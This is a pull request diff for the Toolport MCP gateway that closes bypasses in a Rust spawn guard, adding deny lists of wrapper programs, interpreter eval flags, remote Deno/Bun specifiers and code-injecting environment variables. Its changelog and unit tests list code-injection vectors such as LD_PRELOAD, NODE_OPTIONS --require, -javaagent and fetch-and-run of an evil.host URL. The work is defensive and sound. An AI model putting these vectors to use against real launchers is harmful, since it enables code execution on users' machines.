### PR TITLE
security(spawn): close wrapper / interpreter / deno / env-injection bypasses

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,16 @@ Entries before the rename below shipped under the project's former name, Conduit
 ## [Unreleased]
 
 ### Security
+- **Closed several bypasses in the stdio spawn guard** (the supply-chain check that
+  refuses code-smuggling launch args on a spawned server). An adversarial review found
+  a booby-trapped (team- or registry-sourced) config could still reach code execution
+  through: a wrapper command (`env`/`sudo`/`time`/... run the real program from their
+  args), Deno's `eval` / `run <remote-url>` subcommands, several unlisted interpreters
+  (`osascript`, `elixir`, `lua`, `Rscript`, `julia`, ...) and `cmd /c` on Windows, an
+  attached `node -r./x` preload, and code-injecting env vars in the config
+  (`LD_PRELOAD`, `DYLD_INSERT_LIBRARIES`, `BASH_ENV`, `PERL5OPT`, `RUBYOPT`, and
+  preload/eval options inside `NODE_OPTIONS`). The guard now refuses all of these while
+  still allowing the normal launchers (npx/node/python/docker, benign env vars).
 - **Agent-control enable/disable now respects the client's scope.** In HTTP mode a
   registered client could call `toolport_enable_server` / `toolport_disable_server` on
   a server outside its allowed set (toggling another tenant's server), and a "no server

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -55,6 +55,12 @@ Entries before the rename below shipped under the project's former name, Conduit
   Realistic results are far under the cap, so detection is unaffected in practice.
 
 ### Added
+- **Tool identities (capability provenance).** A new Activity panel shows what each
+  model-visible tool name actually maps to: its source server and the profiles that
+  enable it, the pinned definition fingerprint drift detection checks against, and when
+  the tool was first seen / last changed. Prefixing helps the model pick a tool; this
+  lets a human verify what crossed the boundary. (The integrity baseline now tracks
+  first-seen / last-changed per tool to power it.)
 - **Teams can require human approval org-wide.** A team admin can turn on "Require
   human approval" in the Teams policy, and every member's gateway then holds gated
   tool calls for a person to approve. Like the other org policies, it's tighten-only:

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,15 +8,18 @@ Entries before the rename below shipped under the project's former name, Conduit
 
 ### Security
 - **Closed several bypasses in the stdio spawn guard** (the supply-chain check that
-  refuses code-smuggling launch args on a spawned server). An adversarial review found
-  a booby-trapped (team- or registry-sourced) config could still reach code execution
-  through: a wrapper command (`env`/`sudo`/`time`/... run the real program from their
-  args), Deno's `eval` / `run <remote-url>` subcommands, several unlisted interpreters
-  (`osascript`, `elixir`, `lua`, `Rscript`, `julia`, ...) and `cmd /c` on Windows, an
-  attached `node -r./x` preload, and code-injecting env vars in the config
-  (`LD_PRELOAD`, `DYLD_INSERT_LIBRARIES`, `BASH_ENV`, `PERL5OPT`, `RUBYOPT`, and
-  preload/eval options inside `NODE_OPTIONS`). The guard now refuses all of these while
-  still allowing the normal launchers (npx/node/python/docker, benign env vars).
+  refuses code-smuggling launch args on a spawned server). Two rounds of adversarial
+  review found a booby-trapped (team- or registry-sourced) config could still reach code
+  execution through: wrapper programs (`sudo`/`time`/`flock`/`busybox`/... run the real
+  program from their args); Deno/Bun remote execution (`deno eval`, `deno run`/`serve`
+  and `bun run` of an `http(s)://` / `npm:` / `jsr:` target); several unlisted
+  interpreters (`osascript`, `elixir`, `lua`, `Rscript`, `julia`, `awk`, ...) and
+  `cmd /c` on Windows; an attached `node -r./x` preload; and code-injecting env vars in
+  the config (`LD_PRELOAD`, `DYLD_INSERT_LIBRARIES`, `BASH_ENV`, and preload/eval options
+  inside `NODE_OPTIONS` / `RUBYOPT` / `JAVA_TOOL_OPTIONS`). The guard now catches all of
+  these. `env VAR=val <cmd>` still works (the assignments are screened and the real
+  command is checked), and normal launchers (npx/node/python/docker, benign env/tuning
+  vars) are unaffected.
 - **Agent-control enable/disable now respects the client's scope.** In HTTP mode a
   registered client could call `toolport_enable_server` / `toolport_disable_server` on
   a server outside its allowed set (toggling another tenant's server), and a "no server

--- a/src-tauri/src/downstream.rs
+++ b/src-tauri/src/downstream.rs
@@ -266,21 +266,44 @@ fn forward_line(
 /// / module-preload flags and container-escape flags, none of which a normal
 /// `npx` / `uvx` / binary MCP server needs. Returns `Err(reason)` to block the
 /// spawn; the reason surfaces to the member.
+/// Wrapper programs that run their first bare argument as the REAL command, so
+/// screening only the wrapper name lets `env node -e <code>` (or `sudo`, `time`, ...)
+/// smuggle an interpreter past every check below. Parsing each wrapper's own flags to
+/// find the inner command is fragile, and a parse slip is a silent bypass, so we refuse
+/// wrappers outright: a server that needs an env var sets it in the config's env field,
+/// and one that genuinely needs a wrapper ships a dedicated launcher.
+const LAUNCHER_WRAPPERS: &[&str] = &[
+    "env", "sudo", "doas", "time", "nice", "nohup", "xargs", "stdbuf", "timeout",
+    "setsid", "ionice", "chrt", "taskset", "setarch", "unbuffer", "script", "watch",
+];
+
 pub fn screen_spawn_command(command: &str, args: &[String]) -> Result<(), String> {
-    let dangerous: Option<&str> = match command_basename(command).as_str() {
+    let base = command_basename(command);
+    if LAUNCHER_WRAPPERS.contains(&base.as_str()) {
+        return Err(format!(
+            "refusing to launch '{command}': wrapper programs like env/sudo/time run \
+             another command from their arguments, which would bypass Toolport's spawn \
+             guard. Set environment variables in the server's env field, and name the \
+             real program as the command."
+        ));
+    }
+    let dangerous: Option<&str> = match base.as_str() {
         // Interpreters: inline-eval and module-preload execute attacker-supplied
         // code without a script file on disk.
-        "node" | "nodejs" | "deno" | "bun" => {
-            first_flag(args, &["-e", "--eval", "-p", "--print", "-r", "--require", "--import"])
-        }
+        "node" | "nodejs" | "bun" => node_dangerous(args),
+        "deno" => deno_dangerous(args),
         "python" | "python2" | "python3" | "pypy" | "pypy3" => first_flag(args, &["-c"]),
         "ruby" => first_flag(args, &["-e"]),
         "perl" => first_flag(args, &["-e"]),
         "php" => first_flag(args, &["-r"]),
-        // Shells: `-c <string>` (or `/c` on Windows shells) runs an arbitrary line.
-        "sh" | "bash" | "zsh" | "dash" | "ash" | "fish" | "ksh" | "pwsh" | "powershell" => {
-            first_flag(args, &["-c", "-command", "/c", "/command"])
+        // More interpreters whose `-e`/`--eval` runs an inline program with no file.
+        "osascript" | "elixir" | "iex" | "lua" | "luajit" | "rscript" | "r" | "julia"
+        | "groovy" | "scala" | "clojure" | "bb" | "tclsh" | "wish" => {
+            first_flag(args, &["-e", "--eval", "--eval-string"])
         }
+        // Shells: `-c <string>` (or `/c` / `/k` on Windows shells) runs an arbitrary line.
+        "sh" | "bash" | "zsh" | "dash" | "ash" | "fish" | "ksh" | "cmd" | "pwsh"
+        | "powershell" => first_flag(args, &["-c", "-command", "/c", "/k", "/command"]),
         // Container runtimes: privileged mode, capability/device passthrough, and
         // host-namespace sharing escalate past a normal host process (a plain `-v`
         // mount does not, and stays allowed; see container_escape_flag).
@@ -292,11 +315,92 @@ pub fn screen_spawn_command(command: &str, args: &[String]) -> Result<(), String
             "refusing to launch '{command}': the argument '{flag}' can execute \
              arbitrary code or escape isolation. Toolport blocks inline-eval and \
              privileged-container flags on spawned servers as a supply-chain guard. \
-             If this server is yours and you trust it, launch it from a script file \
-             or a wrapper binary instead of an inline command."
+             If this server is yours and you trust it, run it from a dedicated script \
+             or launcher you control instead of an inline command."
         )),
         None => Ok(()),
     }
+}
+
+/// Node/Bun eval + module-preload flags, in `--flag[=x]` form AND the attached short
+/// form node accepts for require (`-r./pwn.js`), which a plain equality check misses.
+fn node_dangerous(args: &[String]) -> Option<&str> {
+    const FLAGS: &[&str] = &[
+        "-e", "--eval", "-p", "--print", "-r", "--require", "--import", "--loader",
+        "--experimental-loader", "--preload",
+    ];
+    args.iter()
+        .find(|a| {
+            let al = a.to_ascii_lowercase();
+            let head = al.split('=').next().unwrap_or(&al);
+            FLAGS.contains(&head)
+                // `-r<module>` attached (single dash), e.g. `-r./pwn.js`.
+                || (al.starts_with("-r") && al.len() > 2 && !al.starts_with("--"))
+        })
+        .map(|a| a.as_str())
+}
+
+/// Deno's lethal invocations are SUBCOMMANDS, not flags: `eval <code>` runs inline
+/// code, and `run <remote-url>` executes code fetched over the network. (A `deno run`
+/// of a LOCAL script is the normal case and stays allowed.)
+fn deno_dangerous(args: &[String]) -> Option<&str> {
+    if let Some(sub) = args.iter().find(|a| !a.starts_with('-')) {
+        if sub.eq_ignore_ascii_case("eval") {
+            return Some(sub.as_str());
+        }
+        if sub.eq_ignore_ascii_case("run") {
+            if let Some(url) = args.iter().find(|a| {
+                let al = a.to_ascii_lowercase();
+                al.starts_with("http://") || al.starts_with("https://")
+            }) {
+                return Some(url.as_str());
+            }
+        }
+    }
+    first_flag(args, &["-e", "--eval", "-p", "--print"])
+}
+
+/// Screen the child's environment: even a benign command (`node server.js`) becomes
+/// code execution if the config's env preloads code via the dynamic linker or an
+/// interpreter's option/startup var. These have no legitimate use for a server
+/// launcher, so refuse them (this is why we also refuse `env` as the command: the env
+/// field is the ONLY way to set variables, and it's screened here).
+pub fn screen_spawn_env(env: &[(String, String)]) -> Result<(), String> {
+    // Always-refuse: dynamic-linker preload/audit + interpreter startup-file / option
+    // vars that run code before (or instead of) the entry program.
+    const BLOCKED: &[&str] = &[
+        "LD_PRELOAD", "LD_AUDIT", "DYLD_INSERT_LIBRARIES", "BASH_ENV", "ENV",
+        "PERL5OPT", "RUBYOPT",
+    ];
+    for (k, v) in env {
+        let ku = k.trim().to_ascii_uppercase();
+        if BLOCKED.contains(&ku.as_str()) {
+            return Err(format!(
+                "refusing to launch: the environment variable '{k}' preloads or injects \
+                 code into the process. Remove it from the server's env."
+            ));
+        }
+        // NODE_OPTIONS is often legit (heap size, etc.); refuse only the preload/eval
+        // options inside it. (Node itself rejects --eval in NODE_OPTIONS, but --require
+        // / --import / --loader are honored and are RCE.)
+        if ku == "NODE_OPTIONS" {
+            for tok in v.split_whitespace() {
+                let tl = tok.to_ascii_lowercase();
+                let head = tl.split('=').next().unwrap_or(&tl);
+                if matches!(
+                    head,
+                    "--require" | "--import" | "--loader" | "--experimental-loader" | "--eval"
+                ) || (head.starts_with("-r") && head.len() > 2 && !head.starts_with("--"))
+                {
+                    return Err(format!(
+                        "refusing to launch: NODE_OPTIONS contains '{tok}', which preloads \
+                         or evaluates code. Remove it from the server's env."
+                    ));
+                }
+            }
+        }
+    }
+    Ok(())
 }
 
 /// Lowercased final path segment without its extension, splitting on BOTH `/` and
@@ -401,10 +505,12 @@ impl StdioTransport {
         env: &[(String, String)],
         dirty: Option<Arc<AtomicBool>>,
     ) -> Result<Self, String> {
-        // Supply-chain guard: refuse code-smuggling / container-escape args before
-        // we hand the command to the OS. Applies to every spawn path (probe,
-        // playground, gateway) so a booby-trapped config never reaches a process.
+        // Supply-chain guard: refuse code-smuggling / container-escape args AND
+        // code-injecting env vars before we hand the command to the OS. Applies to
+        // every spawn path (probe, playground, gateway) so a booby-trapped config
+        // never reaches a process.
         screen_spawn_command(command, args)?;
+        screen_spawn_env(env)?;
         let resolved = resolve_command(command);
         let mut cmd = Command::new(&resolved);
         cmd.args(args)
@@ -956,7 +1062,7 @@ fn extract_array(result: &Value, key: &str) -> Vec<Value> {
 
 #[cfg(test)]
 mod tests {
-    use super::{resolve_command, screen_resolved_addrs, screen_spawn_command};
+    use super::{resolve_command, screen_resolved_addrs, screen_spawn_command, screen_spawn_env};
 
     #[test]
     fn ssrf_resolver_screens_resolved_addresses() {
@@ -1054,6 +1160,70 @@ mod tests {
         assert!(screen_spawn_command("C:\\Program Files\\nodejs\\NODE.EXE", &argv(&["-E", "x"])).is_err());
         // A non-interpreter that merely has a `-e`-looking arg is untouched.
         assert!(screen_spawn_command("my-server", &argv(&["-e", "value"])).is_ok());
+    }
+
+    #[test]
+    fn spawn_guard_rejects_wrapper_commands() {
+        // Wrapper programs run the REAL command from their args, which would bypass the
+        // basename dispatch (`env node -e evil`). Refused outright, in any path form.
+        for w in ["env", "sudo", "doas", "time", "nice", "nohup", "xargs", "stdbuf", "timeout"] {
+            assert!(
+                screen_spawn_command(w, &argv(&["node", "-e", "evil()"])).is_err(),
+                "{w} wrapper should be refused"
+            );
+        }
+        assert!(screen_spawn_command("env", &argv(&["FOO=bar", "node", "server.js"])).is_err());
+        assert!(screen_spawn_command("/usr/bin/env", &argv(&["python", "-c", "x"])).is_err());
+    }
+
+    #[test]
+    fn spawn_guard_blocks_more_interpreters_and_shells() {
+        assert!(screen_spawn_command("osascript", &argv(&["-e", "do shell script \"x\""])).is_err());
+        assert!(screen_spawn_command("elixir", &argv(&["-e", "System.cmd(0,0)"])).is_err());
+        assert!(screen_spawn_command("lua", &argv(&["-e", "os.execute('x')"])).is_err());
+        assert!(screen_spawn_command("Rscript", &argv(&["-e", "system('x')"])).is_err());
+        assert!(screen_spawn_command("julia", &argv(&["-e", "run(`x`)"])).is_err());
+        // Windows `cmd /c` / `/k` was previously unscreened (only pwsh was listed).
+        assert!(screen_spawn_command("cmd", &argv(&["/c", "evil.bat"])).is_err());
+        assert!(screen_spawn_command("cmd.exe", &argv(&["/k", "evil"])).is_err());
+        // Running a real script file is fine.
+        assert!(screen_spawn_command("lua", &argv(&["server.lua"])).is_ok());
+        assert!(screen_spawn_command("Rscript", &argv(&["app.R"])).is_ok());
+    }
+
+    #[test]
+    fn spawn_guard_blocks_deno_eval_and_remote_run() {
+        // Deno's lethal invocations are SUBCOMMANDS, not flags.
+        assert!(screen_spawn_command("deno", &argv(&["eval", "Deno.exit()"])).is_err());
+        assert!(screen_spawn_command("deno", &argv(&["run", "-A", "https://evil.host/x.ts"])).is_err());
+        // A normal local `deno run` is allowed.
+        assert!(screen_spawn_command("deno", &argv(&["run", "-A", "./server.ts"])).is_ok());
+    }
+
+    #[test]
+    fn spawn_guard_blocks_node_attached_require() {
+        // `-r<module>` attached (no `=`) previously slipped the equality check.
+        assert!(screen_spawn_command("node", &argv(&["-r./pwn.js", "server.js"])).is_err());
+        assert!(screen_spawn_command("node", &argv(&["--loader", "./pwn.mjs", "server.js"])).is_err());
+        assert!(screen_spawn_command("node", &argv(&["dist/server.js"])).is_ok());
+    }
+
+    #[test]
+    fn spawn_env_blocks_code_injection_vars() {
+        let e = |k: &str, v: &str| vec![(k.to_string(), v.to_string())];
+        assert!(screen_spawn_env(&e("LD_PRELOAD", "/tmp/pwn.so")).is_err());
+        assert!(screen_spawn_env(&e("DYLD_INSERT_LIBRARIES", "/tmp/pwn.dylib")).is_err());
+        assert!(screen_spawn_env(&e("BASH_ENV", "/tmp/pwn.sh")).is_err());
+        assert!(screen_spawn_env(&e("PERL5OPT", "-Mevil")).is_err());
+        assert!(screen_spawn_env(&e("RUBYOPT", "-rpwn")).is_err());
+        // NODE_OPTIONS: preload/eval options refused, benign tuning allowed.
+        assert!(screen_spawn_env(&e("NODE_OPTIONS", "--require ./pwn.js")).is_err());
+        assert!(screen_spawn_env(&e("NODE_OPTIONS", "--loader=./pwn.mjs")).is_err());
+        assert!(screen_spawn_env(&e("NODE_OPTIONS", "--max-old-space-size=4096")).is_ok());
+        // Ordinary server config env is fine.
+        assert!(screen_spawn_env(&e("API_TOKEN", "sk-123")).is_ok());
+        assert!(screen_spawn_env(&e("DEBUG", "1")).is_ok());
+        assert!(screen_spawn_env(&[]).is_ok());
     }
 
     #[test]

--- a/src-tauri/src/downstream.rs
+++ b/src-tauri/src/downstream.rs
@@ -267,21 +267,30 @@ fn forward_line(
 /// `npx` / `uvx` / binary MCP server needs. Returns `Err(reason)` to block the
 /// spawn; the reason surfaces to the member.
 /// Wrapper programs that run their first bare argument as the REAL command, so
-/// screening only the wrapper name lets `env node -e <code>` (or `sudo`, `time`, ...)
+/// screening only the wrapper name lets `sudo node -e <code>` (or `time`, `flock`, ...)
 /// smuggle an interpreter past every check below. Parsing each wrapper's own flags to
 /// find the inner command is fragile, and a parse slip is a silent bypass, so we refuse
-/// wrappers outright: a server that needs an env var sets it in the config's env field,
-/// and one that genuinely needs a wrapper ships a dedicated launcher.
+/// these outright. (`env` is handled specially below so the common `env VAR=val cmd`
+/// pattern keeps working.) A server that needs a wrapper ships a dedicated launcher.
 const LAUNCHER_WRAPPERS: &[&str] = &[
-    "env", "sudo", "doas", "time", "nice", "nohup", "xargs", "stdbuf", "timeout",
-    "setsid", "ionice", "chrt", "taskset", "setarch", "unbuffer", "script", "watch",
+    "sudo", "doas", "su", "runuser", "pkexec", "time", "nice", "nohup", "xargs",
+    "stdbuf", "timeout", "setsid", "ionice", "chrt", "taskset", "setarch", "unbuffer",
+    "script", "watch", "flock", "busybox", "proxychains", "proxychains4", "torify",
+    "chroot", "capsh", "firejail", "wine",
 ];
 
 pub fn screen_spawn_command(command: &str, args: &[String]) -> Result<(), String> {
     let base = command_basename(command);
+    // `env [VAR=val ...] <cmd> [args]` is a common, legitimate config pattern, so rather
+    // than refuse it we peel off the leading assignments (screened like the env field)
+    // and screen the real inner command. env with its own flags is unusual and hard to
+    // parse safely, so that still fails closed.
+    if base == "env" {
+        return screen_env_wrapper(args);
+    }
     if LAUNCHER_WRAPPERS.contains(&base.as_str()) {
         return Err(format!(
-            "refusing to launch '{command}': wrapper programs like env/sudo/time run \
+            "refusing to launch '{command}': wrapper programs like sudo/time/flock run \
              another command from their arguments, which would bypass Toolport's spawn \
              guard. Set environment variables in the server's env field, and name the \
              real program as the command."
@@ -290,12 +299,15 @@ pub fn screen_spawn_command(command: &str, args: &[String]) -> Result<(), String
     let dangerous: Option<&str> = match base.as_str() {
         // Interpreters: inline-eval and module-preload execute attacker-supplied
         // code without a script file on disk.
-        "node" | "nodejs" | "bun" => node_dangerous(args),
+        "node" | "nodejs" => node_dangerous(args),
+        "bun" => bun_dangerous(args),
         "deno" => deno_dangerous(args),
         "python" | "python2" | "python3" | "pypy" | "pypy3" => first_flag(args, &["-c"]),
         "ruby" => first_flag(args, &["-e"]),
         "perl" => first_flag(args, &["-e"]),
-        "php" => first_flag(args, &["-r"]),
+        // php: -r/-R run inline code (-R lowercases to -r), -B runs code before input.
+        "php" => first_flag(args, &["-r", "-b"]),
+        "awk" | "gawk" | "mawk" | "nawk" => awk_dangerous(args),
         // More interpreters whose `-e`/`--eval` runs an inline program with no file.
         "osascript" | "elixir" | "iex" | "lua" | "luajit" | "rscript" | "r" | "julia"
         | "groovy" | "scala" | "clojure" | "bb" | "tclsh" | "wish" => {
@@ -340,24 +352,96 @@ fn node_dangerous(args: &[String]) -> Option<&str> {
         .map(|a| a.as_str())
 }
 
+/// A remote code specifier deno/bun will fetch and execute: an http(s) URL or an
+/// `npm:` / `jsr:` registry ref. `deno run npm:evil` runs untrusted network code the
+/// same as `deno run https://evil`, so both are screened.
+fn remote_specifier(arg: &str) -> bool {
+    let a = arg.to_ascii_lowercase();
+    a.starts_with("http://")
+        || a.starts_with("https://")
+        || a.starts_with("npm:")
+        || a.starts_with("jsr:")
+}
+
 /// Deno's lethal invocations are SUBCOMMANDS, not flags: `eval <code>` runs inline
-/// code, and `run <remote-url>` executes code fetched over the network. (A `deno run`
-/// of a LOCAL script is the normal case and stays allowed.)
+/// code, and `run`/`serve <remote>` executes code fetched from the network or a
+/// registry. (A `deno run` of a LOCAL script is the normal case and stays allowed.)
 fn deno_dangerous(args: &[String]) -> Option<&str> {
     if let Some(sub) = args.iter().find(|a| !a.starts_with('-')) {
-        if sub.eq_ignore_ascii_case("eval") {
+        let s = sub.to_ascii_lowercase();
+        if s == "eval" {
             return Some(sub.as_str());
         }
-        if sub.eq_ignore_ascii_case("run") {
-            if let Some(url) = args.iter().find(|a| {
-                let al = a.to_ascii_lowercase();
-                al.starts_with("http://") || al.starts_with("https://")
-            }) {
-                return Some(url.as_str());
+        if s == "run" || s == "serve" {
+            if let Some(r) = args.iter().find(|a| remote_specifier(a)) {
+                return Some(r.as_str());
             }
         }
     }
     first_flag(args, &["-e", "--eval", "-p", "--print"])
+}
+
+/// Bun shares node's eval/preload flags, and additionally executes a remote specifier
+/// via `bun run <remote>`. (`bun run <script>` / `bun x <pkg>` of a local/registry
+/// package is the normal case, like npx, and stays allowed.)
+fn bun_dangerous(args: &[String]) -> Option<&str> {
+    if let Some(f) = node_dangerous(args) {
+        return Some(f);
+    }
+    if let Some(sub) = args.iter().find(|a| !a.starts_with('-')) {
+        if sub.eq_ignore_ascii_case("run") {
+            if let Some(r) = args.iter().find(|a| remote_specifier(a)) {
+                return Some(r.as_str());
+            }
+        }
+    }
+    None
+}
+
+/// awk runs its program from a `-f file` OR inline as the first bare arg. An inline
+/// program (`awk 'BEGIN{system(...)}'`) is arbitrary code with no file on disk, so an
+/// awk invocation WITHOUT a `-f`/`--file` is refused; `awk -f script.awk` is allowed.
+fn awk_dangerous(args: &[String]) -> Option<&str> {
+    let has_file = args.iter().any(|a| {
+        let al = a.to_ascii_lowercase();
+        al == "-f" || al == "--file" || al.starts_with("--file=") || (al.starts_with("-f") && al.len() > 2)
+    });
+    if has_file {
+        return None;
+    }
+    args.iter().find(|a| !a.starts_with('-')).map(|a| a.as_str())
+}
+
+/// Screen `env [VAR=val ...] <cmd> [args]`: peel the leading assignments (screened the
+/// same way as the config's env field, so `env LD_PRELOAD=x node` is caught), then
+/// screen the real inner command. `env` with its own flags (`-S`, `-u`, `-i`, ...) is
+/// unusual and fragile to parse, so it fails closed.
+fn screen_env_wrapper(args: &[String]) -> Result<(), String> {
+    let mut assignments: Vec<(String, String)> = Vec::new();
+    let mut i = 0;
+    while let Some(a) = args.get(i) {
+        if a.starts_with('-') {
+            return Err(
+                "refusing to launch 'env' with flags: set variables in the server's env \
+                 field and name the program directly."
+                    .to_string(),
+            );
+        }
+        // A leading `KEY=VALUE` (key has no path separator) is an env assignment; the
+        // first token that isn't one is the real command.
+        match a.split_once('=') {
+            Some((k, v)) if !k.is_empty() && !k.contains('/') && !k.contains('\\') => {
+                assignments.push((k.to_string(), v.to_string()));
+                i += 1;
+            }
+            _ => break,
+        }
+    }
+    screen_spawn_env(&assignments)?;
+    match args.get(i) {
+        Some(cmd) => screen_spawn_command(cmd, &args[i + 1..]),
+        None => Ok(()), // `env` with only assignments just sets vars; harmless.
+    }
 }
 
 /// Screen the child's environment: even a benign command (`node server.js`) becomes
@@ -366,11 +450,21 @@ fn deno_dangerous(args: &[String]) -> Option<&str> {
 /// launcher, so refuse them (this is why we also refuse `env` as the command: the env
 /// field is the ONLY way to set variables, and it's screened here).
 pub fn screen_spawn_env(env: &[(String, String)]) -> Result<(), String> {
-    // Always-refuse: dynamic-linker preload/audit + interpreter startup-file / option
-    // vars that run code before (or instead of) the entry program.
+    // Always-refuse: dynamic-linker preload/audit + shell startup-file vars that run
+    // code before (or instead of) the entry program. These have no benign value.
     const BLOCKED: &[&str] = &[
         "LD_PRELOAD", "LD_AUDIT", "DYLD_INSERT_LIBRARIES", "BASH_ENV", "ENV",
-        "PERL5OPT", "RUBYOPT",
+    ];
+    // Option vars that are usually benign (tuning) but can inject code via specific
+    // options; only those options are refused (whole-var blocking false-positived on
+    // benign values like RUBYOPT=-W0). Each entry: (VAR, dangerous option prefixes).
+    // -r is ruby/node require; -e is omitted for RUBYOPT because it doesn't honor it and
+    // would collide with the benign `-E<encoding>` after lowercasing.
+    const OPTION_VARS: &[(&str, &[&str])] = &[
+        ("NODE_OPTIONS", &["--require", "--import", "--loader", "--experimental-loader", "--eval", "-r"]),
+        ("RUBYOPT", &["-r"]),
+        ("JAVA_TOOL_OPTIONS", &["-javaagent", "-agentlib", "-agentpath"]),
+        ("_JAVA_OPTIONS", &["-javaagent", "-agentlib", "-agentpath"]),
     ];
     for (k, v) in env {
         let ku = k.trim().to_ascii_uppercase();
@@ -380,21 +474,16 @@ pub fn screen_spawn_env(env: &[(String, String)]) -> Result<(), String> {
                  code into the process. Remove it from the server's env."
             ));
         }
-        // NODE_OPTIONS is often legit (heap size, etc.); refuse only the preload/eval
-        // options inside it. (Node itself rejects --eval in NODE_OPTIONS, but --require
-        // / --import / --loader are honored and are RCE.)
-        if ku == "NODE_OPTIONS" {
+        if let Some((_, bad)) = OPTION_VARS.iter().find(|(name, _)| *name == ku) {
             for tok in v.split_whitespace() {
                 let tl = tok.to_ascii_lowercase();
                 let head = tl.split('=').next().unwrap_or(&tl);
-                if matches!(
-                    head,
-                    "--require" | "--import" | "--loader" | "--experimental-loader" | "--eval"
-                ) || (head.starts_with("-r") && head.len() > 2 && !head.starts_with("--"))
-                {
+                // Prefix match so attached forms are caught in both `-r<mod>` and
+                // `-javaagent:<jar>` (colon) shapes, not just an exact token.
+                if bad.iter().any(|b| head == *b || head.starts_with(b)) {
                     return Err(format!(
-                        "refusing to launch: NODE_OPTIONS contains '{tok}', which preloads \
-                         or evaluates code. Remove it from the server's env."
+                        "refusing to launch: {k} contains '{tok}', which preloads or \
+                         evaluates code. Remove it from the server's env."
                     ));
                 }
             }
@@ -1165,15 +1254,50 @@ mod tests {
     #[test]
     fn spawn_guard_rejects_wrapper_commands() {
         // Wrapper programs run the REAL command from their args, which would bypass the
-        // basename dispatch (`env node -e evil`). Refused outright, in any path form.
-        for w in ["env", "sudo", "doas", "time", "nice", "nohup", "xargs", "stdbuf", "timeout"] {
+        // basename dispatch. Refused outright, in any path form.
+        for w in [
+            "sudo", "doas", "su", "runuser", "pkexec", "time", "nice", "nohup", "xargs",
+            "stdbuf", "timeout", "flock", "busybox", "proxychains", "chroot", "capsh",
+            "firejail", "wine",
+        ] {
             assert!(
                 screen_spawn_command(w, &argv(&["node", "-e", "evil()"])).is_err(),
                 "{w} wrapper should be refused"
             );
         }
-        assert!(screen_spawn_command("env", &argv(&["FOO=bar", "node", "server.js"])).is_err());
-        assert!(screen_spawn_command("/usr/bin/env", &argv(&["python", "-c", "x"])).is_err());
+    }
+
+    #[test]
+    fn spawn_guard_env_wrapper_screens_inner_command_and_assignments() {
+        // The common `env VAR=val <cmd>` pattern is allowed, with the real command screened.
+        assert!(screen_spawn_command("env", &argv(&["FOO=bar", "node", "server.js"])).is_ok());
+        assert!(screen_spawn_command("/usr/bin/env", &argv(&["A=1", "python", "main.py"])).is_ok());
+        // ...but a dangerous inner command is still caught through env.
+        assert!(screen_spawn_command("env", &argv(&["FOO=bar", "node", "-e", "evil()"])).is_err());
+        assert!(screen_spawn_command("env", &argv(&["python", "-c", "x"])).is_err());
+        // ...and a code-injecting assignment is caught (screened like the env field).
+        assert!(screen_spawn_command("env", &argv(&["LD_PRELOAD=/tmp/pwn.so", "node", "s.js"])).is_err());
+        // env with its own flags is unusual and fails closed.
+        assert!(screen_spawn_command("env", &argv(&["-S", "node -e evil()"])).is_err());
+        assert!(screen_spawn_command("env", &argv(&["-u", "PATH", "node", "-e", "x"])).is_err());
+    }
+
+    #[test]
+    fn spawn_guard_blocks_deno_bun_remote_and_awk() {
+        // Deno/Bun remote specifiers (registry + serve), beyond plain http(s).
+        assert!(screen_spawn_command("deno", &argv(&["run", "-A", "npm:@evil/rce"])).is_err());
+        assert!(screen_spawn_command("deno", &argv(&["run", "jsr:@evil/pkg"])).is_err());
+        assert!(screen_spawn_command("deno", &argv(&["serve", "https://evil.host/x.ts"])).is_err());
+        assert!(screen_spawn_command("bun", &argv(&["run", "https://evil.host/x.ts"])).is_err());
+        // Local/registry-package normal usage still passes.
+        assert!(screen_spawn_command("deno", &argv(&["run", "-A", "./server.ts"])).is_ok());
+        assert!(screen_spawn_command("bun", &argv(&["run", "start"])).is_ok());
+        // awk inline program (no -f) is code; `awk -f script.awk` is a file and allowed.
+        assert!(screen_spawn_command("awk", &argv(&["BEGIN{system(\"x\")}"])).is_err());
+        assert!(screen_spawn_command("gawk", &argv(&["-e", "BEGIN{system(\"x\")}"])).is_err());
+        assert!(screen_spawn_command("awk", &argv(&["-f", "script.awk", "data.txt"])).is_ok());
+        // php begin-code.
+        assert!(screen_spawn_command("php", &argv(&["-B", "system('x');", "-R", "0"])).is_err());
     }
 
     #[test]
@@ -1211,18 +1335,26 @@ mod tests {
     #[test]
     fn spawn_env_blocks_code_injection_vars() {
         let e = |k: &str, v: &str| vec![(k.to_string(), v.to_string())];
+        // Always-refused: no benign value.
         assert!(screen_spawn_env(&e("LD_PRELOAD", "/tmp/pwn.so")).is_err());
         assert!(screen_spawn_env(&e("DYLD_INSERT_LIBRARIES", "/tmp/pwn.dylib")).is_err());
         assert!(screen_spawn_env(&e("BASH_ENV", "/tmp/pwn.sh")).is_err());
-        assert!(screen_spawn_env(&e("PERL5OPT", "-Mevil")).is_err());
-        assert!(screen_spawn_env(&e("RUBYOPT", "-rpwn")).is_err());
+        // Case-only evasion is defeated (key is uppercased).
+        assert!(screen_spawn_env(&e("ld_preload", "/tmp/pwn.so")).is_err());
         // NODE_OPTIONS: preload/eval options refused, benign tuning allowed.
         assert!(screen_spawn_env(&e("NODE_OPTIONS", "--require ./pwn.js")).is_err());
         assert!(screen_spawn_env(&e("NODE_OPTIONS", "--loader=./pwn.mjs")).is_err());
         assert!(screen_spawn_env(&e("NODE_OPTIONS", "--max-old-space-size=4096")).is_ok());
+        // RUBYOPT: -r/-e refused, benign tuning (-W0) allowed (no longer all-or-nothing).
+        assert!(screen_spawn_env(&e("RUBYOPT", "-rpwn")).is_err());
+        assert!(screen_spawn_env(&e("RUBYOPT", "-W0")).is_ok());
+        // JVM agent injection refused; benign JVM tuning allowed.
+        assert!(screen_spawn_env(&e("JAVA_TOOL_OPTIONS", "-javaagent:/tmp/pwn.jar")).is_err());
+        assert!(screen_spawn_env(&e("_JAVA_OPTIONS", "-agentlib:pwn")).is_err());
+        assert!(screen_spawn_env(&e("JAVA_TOOL_OPTIONS", "-Xmx512m")).is_ok());
         // Ordinary server config env is fine.
         assert!(screen_spawn_env(&e("API_TOKEN", "sk-123")).is_ok());
-        assert!(screen_spawn_env(&e("DEBUG", "1")).is_ok());
+        assert!(screen_spawn_env(&e("PERL5OPT", "-Mstrict")).is_ok());
         assert!(screen_spawn_env(&[]).is_ok());
     }
 

--- a/src-tauri/src/lib.rs
+++ b/src-tauri/src/lib.rs
